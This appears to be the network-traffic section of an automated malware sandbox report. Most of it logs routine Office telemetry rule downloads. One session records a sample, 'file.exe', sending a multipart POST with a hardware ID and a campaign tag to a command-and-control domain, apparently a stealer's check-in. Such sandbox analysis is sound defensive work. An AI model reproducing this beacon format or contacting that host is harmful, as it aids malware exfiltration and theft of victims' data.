                                                                                                                                                                                                                                                              ETag: "0x8DC582BBA701121"
                                                                                                                                                                                                                                                              x-ms-request-id: 417b6c53-401e-0029-0d91-3f9b43000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153130Z-174f7845968vqt9xhC1EWRgten0000000x7g000000005fwh
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:31 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              22192.168.2.104972913.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:32 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:32 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:32 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 464
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582B97FB6C3C"
                                                                                                                                                                                                                                                              x-ms-request-id: a99e6065-701e-006f-4d91-3fafc4000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153132Z-174f7845968zgtf6hC1EWRqd8s0000000q2g00000000d3ub
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:32 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              23192.168.2.104973013.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:32 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:32 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:32 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 494
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BB7010D66"
                                                                                                                                                                                                                                                              x-ms-request-id: f731a5a9-a01e-006f-1092-4013cd000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153132Z-174f7845968j6t2phC1EWRcfe80000000xa0000000009emm
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:32 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              24192.168.2.104973113.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:32 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:32 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:32 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 419
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582B9748630E"
                                                                                                                                                                                                                                                              x-ms-request-id: 02716611-001e-00ad-7089-3f554b000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153132Z-174f7845968vqt9xhC1EWRgten0000000x7g000000005g04
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:32 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              25192.168.2.104973213.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:32 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:33 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 472
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582B9DACDF62"
                                                                                                                                                                                                                                                              x-ms-request-id: 80135fc2-701e-001e-3d45-40f5e6000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153133Z-174f7845968cpnpfhC1EWR3afc0000000wsg00000000a9wm
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:33 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              26192.168.2.104973313.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:32 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:33 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 404
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582B9E8EE0F3"
                                                                                                                                                                                                                                                              x-ms-request-id: f5c4af5a-301e-005d-6385-3fe448000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153133Z-174f78459685726chC1EWRsnbg0000000x900000000011ee
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:33 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              27192.168.2.1049734172.67.160.804438100C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:33 UTC281OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=8OFY4H759M2HNRU
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 12834
                                                                                                                                                                                                                                                              Host: marshal-zhukov.com
                                                                                                                                                                                                                                                              2024-11-27 15:31:33 UTC12834OUTData Raw: 2d 2d 38 4f 46 59 34 48 37 35 39 4d 32 48 4e 52 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 30 30 43 30 37 45 30 34 38 36 37 35 41 44 44 34 45 33 33 45 43 42 36 31 41 39 30 37 39 35 43 0d 0a 2d 2d 38 4f 46 59 34 48 37 35 39 4d 32 48 4e 52 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 38 4f 46 59 34 48 37 35 39 4d 32 48 4e 52 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 69 63 0d 0a 2d 2d
                                                                                                                                                                                                                                                              Data Ascii: --8OFY4H759M2HNRUContent-Disposition: form-data; name="hwid"700C07E048675ADD4E33ECB61A90795C--8OFY4H759M2HNRUContent-Disposition: form-data; name="pid"2--8OFY4H759M2HNRUContent-Disposition: form-data; name="lid"LOGS11--LiveTrafic--
                                                                                                                                                                                                                                                              2024-11-27 15:31:34 UTC1039INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:34 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=6d0l9lv79r6lq4u5eagnstpmk1; expires=Sun, 23-Mar-2025 09:18:12 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QXITqUWJW9SWSS91P04AYS1DBdRG6WmQNJwA9Iv8gFwvIRhXhVykwyyUKCiKaAeXPFlU3MVssaMT8mDxjHF2Sdp8SwyKR%2BDbKT9cTbkkKyBIsuf5lKRmB7aObNxFEyqrB5QaBEc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8e932a75cbbf426d-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1620&min_rtt=1599&rtt_var=615&sent=12&recv=17&lost=0&retrans=0&sent_bytes=2847&recv_bytes=13773&delivery_rate=1826141&cwnd=222&unsent_bytes=0&cid=1956375ca83418f6&ts=1718&x=0"
                                                                                                                                                                                                                                                              2024-11-27 15:31:34 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: eok 8.46.123.75
                                                                                                                                                                                                                                                              2024-11-27 15:31:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              28192.168.2.104973613.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:34 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:34 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:34 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 428
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BAC4F34CA"
                                                                                                                                                                                                                                                              x-ms-request-id: 14e4a643-101e-007a-3c66-40047e000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153134Z-174f7845968nxc96hC1EWRspw80000000wwg00000000ack5
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:34 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              29192.168.2.104973513.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:34 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:34 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:34 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 468
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582B9C8E04C8"
                                                                                                                                                                                                                                                              x-ms-request-id: f5817373-b01e-003e-3591-3f8e41000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153134Z-174f7845968l4kp6hC1EWRe8840000000xb000000000gk8g
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:34 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              30192.168.2.104973713.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
